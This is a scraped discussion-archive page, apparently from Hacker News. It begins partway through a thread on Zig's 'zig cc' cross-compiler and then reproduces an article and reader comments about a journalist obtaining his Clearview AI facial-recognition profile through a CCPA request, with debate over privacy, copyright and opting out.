I would suggest holding your convictions more loosely.

throwaway_pdp09(10000) 4 days ago [-]

I don't want to be negative as there's too much of that about but gcc and similar can do some pretty hefty optimisations, and for any real work I suspect those count for a great deal. Just because zigcc can compile C, neat as it is, doesn't make it a drop-in replacement for gcc.

Does yours do loop unrolling, code hoisting, optimise array accesses to pointer increments, common expression elimination etc?

jeltz(4168) 3 days ago [-]

This is just a new frontend for clang so it should use all the optimization passes of clang. The main new features are convenient cross compilation and better caching for partial compilation results.

lisper(119) 4 days ago [-]

Zig uses clang on the back-end, so while IANA compiler expert, I suspect it does all these things.

hobo_mark(4128) 4 days ago [-]

Yes, it's clang under the hood.

AndyKelley(1111) 4 days ago [-]

Thanks everyone for the kind words! It's been a lot of work to get this far, and the Zig project has further to go still.

If you have a few bucks per month to spare, consider chipping in. I'm hoping to have enough funds soon to hire a second full time developer.

https://github.com/users/andrewrk/sponsorship

cycloptic(10000) 4 days ago [-]

Hi Andy, thanks for your hard work on this. I am not a Zig user/sponsor yet but hopefully I will be soon. It's looking better and better every month.

rochak(4063) 3 days ago [-]

This project invites donations. It is labor of love and solves problems that have been around a long time. Kudos!

acqq(1341) 4 days ago [-]

It is amazing work, I'm so glad you invested your attention in this direction, kudos! I haven't used the language and the compiler yet but just reading the title article I almost jumped from joy, knowing how unexpectedly painful is to target different versions of system libraries on Linux.

cshenton(10000) 4 days ago [-]

Thanks for all your effort on the project. By far my best experience with zig was writing an OpenGL renderer on windows which then "just worked" when I cloned it ran `zig build` on my Linux machine. Felt like magic.

wyldfire(580) 2 days ago [-]

Hijacking your comment to ask a question: how hard is it to add support for a new architecture and/or triple (if I already have support in llvm)?

Grand bootstrapping plan [1] sounds really impressive but still WIP? Is there a commit or series of commits showing recent targets that got support?

[1] https://github.com/ziglang/zig/issues/853

jftuga(4321) 4 days ago [-]

For the 0.60 release, could you please provide a download for Raspberry Pi running Raspbian?

On my RPi 4, 'uname -m -o' returns: armv7l GNU/Linux

Thanks!

nikisweeting(3809) 4 days ago [-]

It's been amazing following all the progress so far. I'm a proud $5/mo sponsor and look forward to writing something in Zig soon!

Are there any concurrency constructs provided by the language yet? I'm just starting to learn how to do concurrency in lower-level langauges (with mutexes and spinlocks and stuff). I'm coming from the world of Python where my experience with concurrent state is limited to simple row-level locks and `with transaction.atomic():`.

An equivalent article to this would be awesome for Zig: https://begriffs.com/posts/2020-03-23-concurrent-programming...

Edit: I just found this announcement for async function support: https://ziglang.org/download/0.5.0/release-notes.html#Async-...

BubRoss(10000) 4 days ago [-]

Why does zig purposely fail on windows text files by default? Do you really expect a language to catch on when you are purposely alienating windows users by refusing to parse \r for some bizarre reason?

eggy(3934) 3 days ago [-]

I was happily supporting Zig/you at $5/month, but things got tight. I will be back on board next month! Keep up the great work Andy!

airstrike(2227) 4 days ago [-]

> Take a moment to appreciate what just happened here - I downloaded a Windows build of Zig, ran it in Wine, using it to cross compile for Linux, and then ran the binary natively. Computers are fun!

> Compare this to downloading Clang, which has 380 MiB Linux-distribution-specific tarballs. Zig's Linux tarballs are fully statically linked, and therefore work correctly on all Linux distributions. The size difference here comes because the Clang tarball ships with more utilities than a C compiler, as well as pre-compiled static libraries for both LLVM and Clang. Zig does not ship with any pre-compiled libraries; instead it ships with source code, and builds what it needs on-the-fly.

Hot damn! You had me at Hello, World!

fao_(3511) 4 days ago [-]

You can do that in clang/gcc but you need to pass: -static and -static-plt(? I can't find what it's called). The second option is to ensure it's loader-independent, otherwise you get problems when compiling and running across musl/glibc platforms

qlk1123(4322) 4 days ago [-]

People really do appreciate such convenience. I am not familiar with Zig, but GO provides me similar experiences for cross-compilation.

Being able to bootstrap FreeBSD/amd64, Linux/arm64, and actually commonly-used OS/ARCH combinations in a few minutes is just like a dream, but it is reality for modern language users.

krate(10000) 3 days ago [-]

> Take a moment to appreciate what just happened here - I downloaded a Windows build of Zig, ran it in Wine, using it to cross compile for Linux, and then ran the binary natively. Computers are fun!

Even though it probably doesn't qualify this is pretty close a Canadian Cross, which for some reason is one of my favorite pieces of CS trivia. It's when you cross compile a cross compiler.

https://en.wikipedia.org/wiki/Cross_compiler#Canadian_Cross

> The term Canadian Cross came about because at the time that these issues were under discussion, Canada had three national political parties.

crazypython(4150) 3 days ago [-]

Dlang is a better C. DMD, the reference compiler for Dlang, can also compile and link with C programs. It can even compile and link with C++03 programs.

It has manual memory management as well as garbage collection. You could call it hybrid memory management. You can manually delete GC objects, as well as allocate GC objects into manually allocated memory.

The Zig website says 'The reference implementation uses LLVM as a backend for state of the art optimizations.' However, LLVM is consistently 5% worse than the GCC toolchain at performance across multiple benchmarks. In contrast, GCC 9 and 10 officially support Dlang.

Help us update the GCC D compiler frontend to the latest DMD.

Help us merge the direct-interface-to-C++ into LLVM D Compiler main. https://github.com/Syniurge/Calypso

Help us port the standard library to WASM.

JyB(10000) 3 days ago [-]

I'm so glad we are seeing a shift towards language simplicity in all aspects (control flows, keywords, feature-set, ...). It'so important in ensuring reliable codebases in general.

woodrowbarlow(10000) 3 days ago [-]

i would love to see a shift towards small languages, which is subtly different from a shift towards simple languages.

there are plenty of things i feel are serious shortcomings of C (mixing error results with returned values is my big one), but the fact that the set of things the language can do is small and the ways you can do them are limited makes it much easier to write code that is easy to read. and that will always keep me coming back.

saagarjha(10000) 3 days ago [-]

I read through the post but I'm still a bit confused as to what parts of this is Zig and what parts are coming from other dependencies. What exactly is zig cc doing, and what does it rely on existing? Where are the savings coming from? Some people are mentioning that this is a clang frontend, so is the novelty here that zig cc 1. passes the the correct options to clang and 2. ships with recompilable support libraries (written in Zig, with a C ABI) to statically link these correctly (or, in the case of glibc, it seems to have some reduced fileset that it compiles into a stub libc to link against)? Where is the clang that the options are being passed to coming from? Is this a libclang or something that Zig ships with? Does this rely on the existence of a 'dumb' cross compiler in the back at all?

thristian(2815) 3 days ago [-]

To compile C code, you need a bunch of different things: headers for the target system, a C compiler targetting that system, and a libc implementation to (statically or dynamically) link against. Different libc implementations are compatible with the C standard, but can be incompatible with each other, so it's important that you get the right one.

Cross-compiling with clang is complex because it's just a C compiler, and doesn't make assumptions about what headers the target system might use, or what libc it's using, so you have to set all those things up separately.

Zig is (apparently) a new language built on Clang/LLVM, so it can re-use that to provide a C compiler. It also makes cross-compilation easier in two other ways. First, it limits the number of supported targets - only Linux and Windows, and on Linux only glibc and musl, and all supported on a fixed list of the most common architectures. Second, building Zig involves pre-compiling every supported libc for every supported OS and architecture, and bundling them with the downloadable Zig package. That moves a lot of work from the end user to the Zig maintainers.

Like most magic tricks there's no actual magic involved, it's just somebody doing more and harder work than you can believe anyone would reasonably do.

speps(2811) 4 days ago [-]

Zig is great and I can't wait to try cc! However, Andrew if you're reading this, the std is very confusingly named. It's not a hash map, it's AutoHashMap, it's not a list, it's a ArrayList, etc. I had a lot of trouble finding idiomatic code without having to search through the std sources, like an example with each struct/fun doc would help a ton.

yellowapple(4306) 3 days ago [-]

I reckon the point of the naming is to force you to think about exactly which behavior you want/need in your program, given that arrays and linked lists (for example) are very different from one another with very different performance characteristics.

It's a bit unfortunate that (last I checked) there's no 'I don't care how it's implemented as long as it's a list' option at the moment (e.g. for libraries that don't necessarily want to be opinionated about which list implementation to use). Should be possible to implement it as a common interface the same way the allocators in Zig's stdlib each implement a common interface (by generating a struct with pointers to the relevant interface functions).

tsimionescu(10000) 4 days ago [-]

To be fair, 'list' is such a generic term it's not really useful. ArraList and LinkedList and even a hash table are all examples of lists, but their performance characteristics vary so wildly that it doesn't make sense to call any of them simply 'list'.

jedisct1(3121) 3 days ago [-]

Can `zig cc` also compile to WebAssembly/WASI?

jedisct1(3121) 3 days ago [-]

Apparently not :(

Zig is unable to provide a libc for the chosen target 'wasm32-wasi-musl'

yellowapple(4306) 3 days ago [-]

Zig itself does support cross-compiling to WASM/WASI (https://ziglang.org/documentation/master/#WebAssembly), so there's surely some way to coax 'zig cc' into doing the same (though I haven't tried it).

drfuchs(3422) 4 days ago [-]

Zig (the language) is very appealing as a 'better C than C'. Check out https://ziglang.org (dis-disclaimer: I'm unaffiliated.)

agapon(10000) 4 days ago [-]

I don't know... To me, zig does not look like C at all. IMO, go and zig are as similar to each other as they are dissimilar to C.

ifreund(10000) 4 days ago [-]

Aye, and it lives up to that claim as well in my opinion, despite being still relatively young and pre-1.0. My favorite thing about Zig is that it has managed to stay simple and solve many of the problems of C without resorting to greatly increased complexity like Rust (which is much more of a C++ replacement than a C replacement in my opinion).

pjmlp(200) 3 days ago [-]

I am still not sold on its security story, usage of @ and module imports.

ndesaulniers(1257) 4 days ago [-]

> (dis-disclaimer: I'm unaffiliated.)

https://ziglang.org/#Sponsors

> drfuchs

oh, ok

boltzmann_brain(10000) 4 days ago [-]

On a first glance, it does look like a simpler version of Rust, and I say it without demeaning Zig. Looks very promising, I'll be keeping an eye for it.

jjnoakes(10000) 4 days ago [-]

I wonder how much it would cost to sponsor compiles-via-c support. I'd love to use zig-the-language but I need to compile for platforms that LLVM does not support, so I would need to use the native C toolchain (assembler/linker at the least, but using the native C compiler seems easier).





Historical Discussions: I got my file from Clearview AI (March 25, 2020: 802 points)
I Got My File from Clearview AI, and It Freaked Me Out (March 24, 2020: 4 points)

(803) I got my file from Clearview AI

803 points 3 days ago by us0r in 1157th position

onezero.medium.com | Estimated reading time – 14 minutes | comments | anchor

I Got My File From Clearview AI, and It Freaked Me Out

Here's how you might be able to get yours

Photo: Aitor Diago/Getty Images

Have you ever had a moment of paranoia just before posting a photo of yourself (or your kid) on social media?

Maybe you felt a vague sense of unease about making the photo public. Or maybe the nebulous thought occurred to you: "What if someone used this for something?" Perhaps you just had a nagging feeling that sharing an image of yourself made you vulnerable, and opened you up to some unknowable, future threat.

It turns out that your fears were likely justified. Someone really has been monitoring nearly everything you post to the public internet. And they genuinely are doing "something" with it.

The someone is Clearview AI. And the something is this: building a detailed profile about you from the photos you post online, making it searchable using only your face, and then selling it to government agencies and police departments who use it to help track you, identify your face in a crowd, and investigate you — even if you've been accused of no crime.

I realize that this sounds like a bunch of conspiracy theory baloney. But it's not. Clearview AI's tech is very real, and it's already in use.

How do I know? Because Clearview has a profile on me. And today I got my hands on it.

Clearview AI was founded in 2017. It's the brainchild of Australian entrepreneur Hoan Ton-That and former political aide Richard Schwartz. For several years, Clearview essentially operated in the shadows. That was until an early 2020 exposé by the New York Times laid bare its activities and business model.

The Times, not usually an institution prone to hyperbole, wrote that Clearview could "end privacy as we know it." According to the exposé, the company scrapes public images from the internet. These can come from news articles, public Facebook posts, social media profiles, or multiple other sources. Clearview has apparently slurped up more than 3 billion of these images.

The company then runs its massive database of images through a facial recognition system, identifying all the people in each image based on their faces. The images are then clustered together which allows the company to form a detailed, face-linked profile of nearly anyone who has published a picture of themselves online (or has had their face featured in a news story, a company website, a mugshot, or the like).

Clearview packages this database into an easy-to-query service (originally called Smartcheckr) and sells it to government agencies, police departments, and a handful of private companies.

Clearview's clients can upload a photo of an unknown person to the system. This can be from a surveillance camera, an anonymous video posted online, or any other source. In emails received by the Times, a detective even bragged about how the system worked on photos taken of unsuspecting subjects through a telephoto lens.

In a matter of seconds, Clearview locates the person in its database using only their face. It then provides their complete profile back to the client. As of early 2020, the company had more than 2,200 customers using its service.

What does a Clearview profile contain? Up until recently, it would have been almost impossible to find out. Companies like Clearview were not required to share their data, and could easily build massive databases of personal information in secret.

Thanks to two landmark pieces of legislation, though, that is changing. In 2018, the European Union began enforcing the General Data Protection Regulation (GDPR). And on January 1, 2020, an equivalent piece of legislation, the California Consumer Privacy Act (CCPA), went into effect in my home state.

Both GDPR and CCPA give consumers unprecedented access to the personal data that companies like Clearview gather about them. If a consumer submits a valid request, companies are required to provide their data to them. The penalties for noncompliance stretch into the tens of millions of dollars. Several other U.S. states are considering similar legislation, and a federal privacy law is expected in the next five years.

Within a week of the Times' expose, I submitted my own CCPA request to Clearview. For about a month, I got no reply. The company then asked me to fill out a web form, which I did. Another several weeks passed. I finally received a message from Clearview asking for a copy of my driver's license and a clear photo of myself.

I provided these. In minutes, they sent back my profile.

For reference, here is the photo that I provided for my search.

It's a candid cellphone photo of me making latkes. I deliberately sent a photo with a lot going on visually, and one where my face is not professionally lit or framed. I wanted to see how Clearview would perform on the kind of everyday photo that anyone might post to social media.

Here is the profile that I got back. Redactions in red are mine, as described below.

Based on the timing of emails and data from the Times' story, I estimate that Clearview retrieved my profile in under one minute. It could have been as fast as a few seconds.

The depth and variety of data that Clearview has gathered on me is staggering. My profile contains, for example, a story published about me in my alma mater's alumni magazine from 2012, and a follow-up article published a year later.

It also includes a profile page from a Python coders' meetup group that I had forgotten I belonged to, as well as a wide variety of posts from a personal blog my wife and I started just after getting married.

The profile contains the URL of my Facebook page, as well as the names of several people with connections to me, including my faculty advisor and a family member (I have redacted their information and images in red prior to publishing my profile here).

From this data, an investigator could determine quite a lot about me. First and most obviously, they would know my name. They would also know where I went to school, what line of work I'm in, and the region where I live.

From my Facebook page, they could see anything I post publicly (I was so shocked by the data available there that I made my profile private after receiving Clearview's report). And they would have data on several of my known associates — more than enough to access their Clearview profiles, too.

If someone was trying to track me down — especially someone with police powers at their disposal — Clearview's profile would give them more than enough data to do so.

Perhaps most worrying is the fact that some of Clearview's data is wrong. The last hit on my profile is a link to a Facebook page for an entirely different person. If an investigator searched my face and followed that lead (perhaps suspecting that the person was actually my alias), it's possible I could be accused of a crime that the unknown, unrelated person whose profile turned up in my report actually did commit.

Remember, all of this data was retrieved using a single image of my face. I've never been arrested or convicted of a crime. Clearview gathered my data without my knowledge, and without any justification or probable cause.

They've likely done the same for you. If they have — and you're a resident of California or a citizen of the EU — the company is legally obligated to give you your profile, too.

To access it, scan or photograph your driver's license, and choose a clear photo of yourself where your face is fully visible (not obscured by glasses, a hat, or other objects). Send these to [email protected] via email. Clearly state that your message is a CCPA or GDPR request.

Follow any instructions you receive. Expect your request to take up to two months to process. Be persistent in following up. And remember that once you receive your data, you have the option to demand that Clearview delete it or amend it if you'd like them to do so.

I know. A lot is going on right now. But as the novel coronavirus spreads worldwide, many facial recognition companies are using the pandemic as a reason to expand their services, including surveilling the public. Sometimes this leads to helpful safety measures. But we also need to be aware of — and actively manage — the privacy implications of this expansion.

Beyond the creepiness factor, Clearview's intelligence gathering raises an age-old question. If you've done nothing wrong, should you care that the company is gathering data about you? If you're a law-abiding citizen, it shouldn't matter, right?

The issue with this is that doing "something wrong" is a very slippery concept. Clearview could be used to investigate serious crimes. But it could also be used to identify every person who attended a political rally or protest, using only surveillance photos or images posted on social media.

As the Times points out, it could also be used to blackmail nearly anyone. An unscrupulous user could record people having an embarrassing conversation in public, determine their identity using their faces, and threaten to publish the conversation unless they paid up.

It could also be used to look people up indiscriminately, for no reason at all. As the Times discovered, Clearview has laid the background for accessing its system via AR glasses. This means it's conceivable that a police officer could walk through a crowd wearing AR goggles, and see the name and background information of every person in their line of sight superimposed over the person's head in real time.

We assume that we can enjoy a certain level of anonymity, even in public spaces. Clearview's technology turns that assumption on its head.

There are other major issues with Clearview's system. Its treatment of copyright, for example, should be enough to make any plaintiff's lawyer's mouth water.

Several of the photos that Clearview gathered of me — and integrated into its product — were taken by professional photographers. The picture on my Meetup profile page, for example, was taken by a photographer I hired. I own the copyright to it. And Clearview never obtained a license to use it.

On this front, the company attempts to hide behind the Digital Millennium Copyright Act. The DMCA provides a safe harbor for platforms like Facebook or Google if their users post copyrighted material. But Clearview is not a platform. And users aren't posting photos to their system — the company is actively grabbing these on its own, without copyright owners' consent. The DMCA is unlikely to apply to it.

The laws around fair use and A.I. products are complex and evolving. But if courts come down on the side of copyright owners, Clearview could potentially be sitting on 3 billion copyright infringements. Each could be worth up to $250,000 in statutory damages, provided copyright owners properly registered their rights. It's a flaw in Clearview's model that could easily bring down the company.

Even if Clearview disappears, though, another similar company would just start up in its place. Web scraping and facial recognition are essentially commodity products today. For a few million dollars, nearly anyone with a startup background could likely build their own version of Clearview in less than a year.

To truly ensure that companies like Clearview (or their clients) don't abuse citizens' privacy, society needs clear legislation dictating when facial recognition and other related technologies can and cannot be used. Already, some cities have begun to pass such legislation. But to be effective, this needs to happen at a much broader scale.

To the company's credit, Clearview's system is not just a privacy pariah. It's also a breakthrough technology for investigating abhorrent crimes like child sexual abuse. As the Times reports, in one case Clearview helped to catch an alleged predator based on a reflected face in an unrelated photo posted at a gym. It's also a powerful tool for solving long-abandoned murders, and all manner of other cold cases.

Any legislation governing technologies like Clearview's should protect citizens from random searches. But at the same time, it should allow authorities to use services like Clearview when their use is justified.

As with any issue involving privacy, until strong legislation is in place, it's up to us as citizens to stay informed, and to protect our own rights.

Luckily, in the United States, we have a document that deals with achieving the proper balance between protecting society and respecting the rights of individuals. It's called the Constitution.

If searches on Clearview followed the same rules as other searches (like the requirement that police agencies obtain a warrant to perform them), this would be a huge step toward protecting the privacy of innocent citizens. Crucially, it would still allow investigators to use the system to solve serious crimes just as they currently use court-authorized searches to investigate suspects.

Until such legislation is passed, the field of facial recognition is essentially the Wild West. Companies can gather nearly any data they want about you, and use it for nearly any purpose.

As with any issue involving privacy, until strong legislation is in place, it's up to us as citizens to stay informed, and to protect our own rights. For Californians — and citizens of the myriad states and countries developing their own privacy laws — we now have powerful tools on our arsenal to do just that.

Rather than waiting for legislation to arrive, leverage these tools today to find out with Clearview and other corporations know about you. Then decide what you want to remove, amend, or leave in place.

The power to control data has traditionally rested with big companies. But it's increasingly shifting into our hands. Only through our own vigilance and action can we ensure that we understand and control the data gathered about us.




All Comments: [-] | anchor

DeathArrow(10000) 3 days ago [-]

They are using copyrighted images. What if 1000 of copyright owners decide to sue them asking $100 000 each?

Kovah(4302) 3 days ago [-]

One thing you should be very careful about is licensing. If you post photos on Facebook or Instagram, you automatically grant them a license to redistribute the photo and share it with others. And these 'others' can include Clearview. So, Clearview could have a contract with Facebook which legally allows them to get and save those photos. So, you are still the copyright owner, but due to licensing Clearview can legally store and use the photos.

About suing them if they would break copyrights: not sure about the US, but in Germany it wouldn't be that easy to actually sue them for such a high sum. You could argue that the company makes money by offering the search service, but there must be evidence that Clearview made that specific sum just with your photo(s), which is very unlikely.

LockAndLol(4341) 3 days ago [-]

I'm not entirely sure what's so shocking about public data, shared willingly by the person to the public, being used to identify the person. If the data weren't/hadn't been shared willingly, I'd definitely see that as a problem. Same thing as if the data were to have been gleaned from non-public sources e.g the person's private belongings or secured digital realms like private forums, password encrypted backups, private profiles, etc.

Cthulhu_(3977) 3 days ago [-]

It's about trust and permission. If I give e.g. a local news website permission to use my portrait, I do NOT implicitly give permission to Clearview, Google, Facebook, etc to use it for their own purposes.

I mean it's implicitly known that anything you post on the internet is public property, but legally that is not the case. Portrait law (at least in my country). You can't just take someone's portrait and use it for your own gains.

samsquire(3969) 3 days ago [-]

Ideally we live in a society where not being anonymous is not such a big risk.

But governments change, the data is still around to be abused.

This is what disturbs me. Is how data can be abused in the future.

Cthulhu_(3977) 3 days ago [-]

Exactly. Very current affairs: governments are looking into getting location data from phone networks, apps, phone manufacturers to determine whether people are sticking to the curfews. And this change in perspective happened real fast.

Does the end justify the means? A pandemic like this is the ideal chance for a government to set up emergency measures like martial law, while the people themselves are too busy trying to look out for themselves and their family to be able to protest it.

Of course, anyone with half a brain already knew that unlimited data gathering, including location or personal information, was a bad thing.

nojvek(4032) 3 days ago [-]

I'm pretty sure ICE is already using that to find potential targets that are not residents.

Most non technical people don't understand how powerful technology is.

chii(3786) 3 days ago [-]

> not being anonymous is not such a big risk.

the world has always been anonymous because of the lack of capability to track large amounts of data - until recently.

Anonymity allows you safety from any one who seeks to predate you. I think that safety needs to be maintained. People stupidly put photos of themselves online, then face tag their friends. This allows third parties to identify your friends and circles, and that's dangerous. All relationship should be reciprocal.

duluca(10000) 3 days ago [-]

This nails it. It's not the present view of you that someone might get, but it's the fact that they can roll back the clock on you and re-interpret anything you did or said or anywhere you went. Digging up some ancient tweet is somewhat analogous to it, but it cuts way deeper when you start thinking about every moment of your life. On the flip side, if you're just living your life OpSec feels overkill...

taneq(10000) 3 days ago [-]

Yep. 'I trust this entity with my data' is absolutely not an argument to be lax with your privacy.

Take Pebble for example. They had a very invasive privacy policy and reserved the right to upload pretty much anything from your phone via the companion app, but they were a cool hacker-friendly hardware startup and a lot of people trusted them.

Years down the track they ran out of runway (the ugly side of 'unicorn or bust' venture capital but that's another rant) and were bought out by Fitbit. Meh, Fitbit seemed pretty good with privacy too so that's alright, I guess?

Now Google's bought Fitbit and potentially has a bunch of very personal, private data on everyone who originally trusted Pebble.

lloeki(4079) 3 days ago [-]

> This is what disturbs me. Is how data can be abused in the future.

The general 1984 style dystopia vision is that there's a gov't change for the worst and you could be SWAT'd out of the blue.

The most probable one is that this kind of tool would be used in far less obvious, if at all visible, ways.

In that situation some kind of honeypot/canary strategy would be nice to reveal shady use but I can't seem to come up with a realistic one.

koolba(634) 3 days ago [-]

This website does some crazy redirect loop between medium at the sub domain when opened without JS. How is that even possible?

ev1(10000) 3 days ago [-]

Server side redirect after tracking cookies aren't set by JS. Advertising.com blogs (AOL?) do the same thing.

saagarjha(10000) 3 days ago [-]

It didn't for me. (It did, however, make the content of the page load roughly two orders of magnitude faster.)

arkadiyt(2583) 3 days ago [-]

Also running into this issue.

ehnto(4324) 3 days ago [-]

Potentially done with an http-equiv meta tag hidden inside a noscript tag

    < meta http-equiv=refresh content=0; url=http://example.com/ >
Cyykratahk(10000) 3 days ago [-]

I had the same issue. Found it was because I had set Firefox to block all cookies for medium.com (probably to get around the article limit).

nieve(4318) 3 days ago [-]

Nothing magic, they're just sending a HTTP 302 redirect if they don't see a cookie. If you hit it with wget you'll see two 302s, one of them with the old 'Moved Temporarily' text and the other with 'Found'. I'm not sure why you only get two with wget, possibly user-agent sniffing. Tracing with firefox's dev tools I see an initial JS redirect, but that may be a bug since I've got javascript disabled for medium. Alternatively it's a bug in NoScript and that's not good. Either way they'll toss a 302 with no js at all.

shakna(2871) 3 days ago [-]

It returns a 302 header with this location:

https://medium.com/m/global-identity?redirectUrl=https%3A%2F...

Which then sends another location of:

https://onezero.medium.com/i-got-my-file-from-clearview-ai-a...

Which just ends up bouncing you back and forth, unless JS is allowed to percolate through. However, there is some useragent sniffing happening, so the exact set of headers changes.

Rafuino(3790) 3 days ago [-]

I submitted an info request about 2 months ago now, and I haven't heard a word from these jackasses

fishmaster(10000) 3 days ago [-]

Keep going. They risk being fined by not answering.

martin-adams(4143) 3 days ago [-]

So will we see a new normal that if you delete your data, you're considered suspicious as it looks like you might be hiding something.

Personal data may soon become the same as a credit score. No data, high risk.

fredsanford(10000) 3 days ago [-]

This is already here with Google if you use oBlock or uMatrix. Endless Captchas...

'We detected suspicious blah blah blah'

air7(3825) 3 days ago [-]

The thorny issue here is that this is all public information put forth willingly by people. These are not leaked medical records. In a way these abilities are like a person saying 'hmm isn't that the guy from that thing a while back?' What are the limits of what is allowed to do with public data? I don't have a clear opinion.

njkleiner(10000) 3 days ago [-]

> These are not leaked medical records. In a way these abilities are like a person saying 'hmm isn't that the guy from that thing a while back?'

That's why I don't think there is much of a point in trying to prevent people (e.g. by law) from crawling and using data in this fashion.

I feel like the only reasonable solution here would be to force these companies to rebuild their databases by legally limiting the lifetime of such data.

That way people have a chance to remove themselves from the database by changing/deleting their online profiles without having to use legal measures like GDPR requests. People wouldn't even have to be aware of any individual database they might be part of; they would be removed from it automatically at some point.

Another benefit of this would be that the pure cost of constantly re-crawling a giant dataset could act as a limiting factor and therefore prevent abuse.

Skunkleton(10000) 3 days ago [-]

The data was shared willingly within the understanding of the person making that decision. Do people really understand how much data in their day to day life they have "willingly" shared?

gentleman11(10000) 3 days ago [-]

This public information includes security cam footage. It's not up to us if people film us, the cameras are everywhere

Talyen42(10000) 3 days ago [-]

I think about it like this: what would happen if you did this manually, at the same scale? If I went around asking every single person you've ever met if they could provide any pictures in which you're in the background, and collected them all and sold them as a collection, i'd be borderline harassing/stalking you. Not necessarily straight up illegal, but maybe in some ways? That's what this is, digitally.

davnn(4287) 3 days ago [-]

So the difference between this an google's reverse image search is that google's matching algorithm is worse (probably because it doesn't include facial recognition)?

Well, public images are public and I don't think banning such a service would prevent governments from implementing something like this .. the technological challenges are getting less and less.

sixstringtheory(4344) 3 days ago [-]

You can presumably hold government officials accountable, but you can't vote out the CEO of Clearview.

40four(4332) 3 days ago [-]

I used to think some of my peers were being overly cautious by purposely trying to obfuscate their online profile. Back in the day, I couldn't care less about putting in effort to try to protect my online privacy. I have slowly but surely come to see the light. Now it's at the forefront of my mind at all times.

Learning about this company (and I imagine other unknown entities are doing the same) has encouraged me to get more aggressive.

I think I will start to try some shenanigans I learned from a friend. I plan on replacing my online profile pics to a random grab from https://www.thispersondoesnotexist.com/. Might not make much of a difference for the old stuff, maybe I can successfully request a data deletion as the article suggests. At least it will introduce a little bit of noise to the AI overloads :)

Cthulhu_(3977) 3 days ago [-]

I grew up with the 'don't use your real name on the internet' in the back of my head, this was before kids got internet safety classes.

5-10 years later, Facebook came up with their real name policy and started asking people to snitch on their friends if they used a fake name. Google, and mainly Youtube, came with a real name policy as well, on the one hand for Google+, but on the other to try and fight comment abuse - theory being people are more hesitant to be a dick on the internet if they use their real name.

But people got used to that real fast, and since there was little consequences anyway, it didn't work.

People have valid reasons to use a fake name on the internet; government and business surveillance is a big one. Abusive / stalker exes are another. Having an alternate persona (e.g. entertainers, authors) which people are trying to hide from their un-understanding or abusive family, or society at large.

stiray(4004) 3 days ago [-]

Replacing pictures wont help (they already have them), GDPR request for deletion might work better but on the other side you also give them your confirmed identity. With companies as shady as this one, they might just set a flag in their database and add your documents data to them.

As you have figured out on your own, public should listen to some people warning about this for more than decade instead of making fun from them (tin foil hat,...).

And if anyone thinks that google and facebook are not having their own versions of clearview, think again. Any form of online presence under real name has to be minimized and it is doable but this would mean that all personal narcissistic pushes would need to be stopped (or should I say - cured) and refrain yourself from using any personal information (no, you wont secure my account by having my phone number, provide me TOTP if the security is really the reason) on the internet while avoiding it beeing stolen by apps (application firewalls, sending back fake data and not using any google applications including removing their preinstalled spyware by rooting the phone).

I can guarantee you that you wont be missing anything relevant (I am doing it for more than decade). But. Will you do that? Can you do that? Do you want to do that? Most people just rather take blue pill.

JDulin(3913) 3 days ago [-]

Just for the record, the journalist who broke the story on Clearview noted that Clearview AI has specifically demonstrated it isn't fooled by thispersondoesnotexist.com:

https://twitter.com/kashhill/status/1218542846694871040?s=20

You won't be giving them any info on you, but you won't be confounding them either.

wideasleep1(10000) 3 days ago [-]

Starting in the early 90's, 'everyone's a dog on the internet', so my profile pics were dogs. One buzzed evening, I changed a few to Fabio. Good luck, Fabio,

api(1134) 3 days ago [-]

Your peers were being rational, but it's a drop in the bucket. I've come to the conclusion that privacy can only be protected with legislation. There is too much surface area to protect for the average person to police their own data trail online. Even experts have a tough time doing it. You'd have to abstain from virtually everything, and even then you can't keep other people from posting you, tagging you, etc.

This isn't a technical issue. It's a political issue.

david-cako(10000) 3 days ago [-]

I too am extremely opposed to any and all non-consenting invasions of digital privacy (i.e., the problem isn't the known-known of what you upload, but the hidden implications of it), but on the contrary, I make a disciplined effort to make my digital fingerprint reflect my actual views and identity. Whatever time capsule my digital identity ends up in, I want to be as accurate and beautiful as possible.

This includes my avid support of corporations which make good faith efforts to defend natural rights and freedoms, and my vehement opposition to corporate/political nonsense that does not represent, in good faith, the interests of humanity and nature. "A reasonable amount" of surveillance is an essential aspect of society, but it SHOULD be considered invasive, and should never be invisible. I suspect that there will be BS metrics to evaluate how "consenting" a given individual is to NSA/Clearview type behavior, and I would hope that I am casting a shield of protection. I feel bad about the fact that an element of bitterness is necessary to be resilient. I know no other way than truth.

I truly act as if AI is learning from me, and believe that there are long reaching and metaphysical effects to all actions.

sxp(2387) 3 days ago [-]

The article is missing a link to the Clearview forms to request a copy of the data or request deletion: https://clearview.ai/privacy/requests

yeswecatan(4146) 3 days ago [-]

Thank you. I was having a hard time finding this.

buza(4033) 3 days ago [-]

Even more incredible is that the opt out link requests a clear view of your face to proceed.

_fullpint(10000) 3 days ago [-]

Its absolutely wild that for anyone that's not a resident of California or EU/UK -- there isn't a way for you to request anything other than specific images/links.

jiveturkey(4257) 3 days ago [-]

This is a case of 'never click 'opt-out' on spam'. Clearview is not to be trusted. One should not go through their process. They are not likely to delete the data, and if they have none, they are likely to create a profile for you.

Funes-(4283) 3 days ago [-]

Nobody should be posting their private data (pictures or videos, for instance) on a publicly accessible site if they want privacy. Look, if you want your relatives, friends, and even acquaintances to see whatever you want them to, just do it through a medium that allows for private communication. It's just common sense.

vharuck(3797) 3 days ago [-]

>It's just common sense.

Based on what and how people share online, the 'common' sense is an expectation of decency in not vacuuming data just because you can. You and I know that's silly, but that's not common sense.

drivebycomment(10000) 3 days ago [-]

A related thought experiment. What if Google or Bing build an image search service based on the face recognition ? If you don't like that idea, how about doing that for celebrities and public figures? If you are ok with one but not the other, what would be a good line distinguishing them and guiding principle? If you are not ok with either or ok with both, why?

More I think about it, more I lean toward allowing both, but I can see why people would not like it.

brandonmenc(3914) 3 days ago [-]

> If you are ok with one but not the other, what would be a good line distinguishing them and guiding principle?

Because celebrity by definition requires trading privacy for fame, and is almost always a decision.

We need a new legal classification for 'public, but not accessible by everyone in the world for the rest of time' information, which is what most regular people assume or desire for themselves.

jachee(10000) 3 days ago [-]

I wonder what would happen if I were to issue them a $5000/mo/piece retroactive license invoice for any/all use of my name/likeness/etc for their profit.

I wonder what would happen if everyone did.

Cthulhu_(3977) 3 days ago [-]

A class-action suit that would probably last for a couple years and end in a settlement where the claimants - assuming they fill(ed) in forms x, y and z, would be entitled to at best a few hundred dollars.

See also the Equifax settlement. I'd say Equifax is the best / most recent example about something like this.

hedora(3864) 3 days ago [-]

I'd love to see a successful copyright case along these lines.

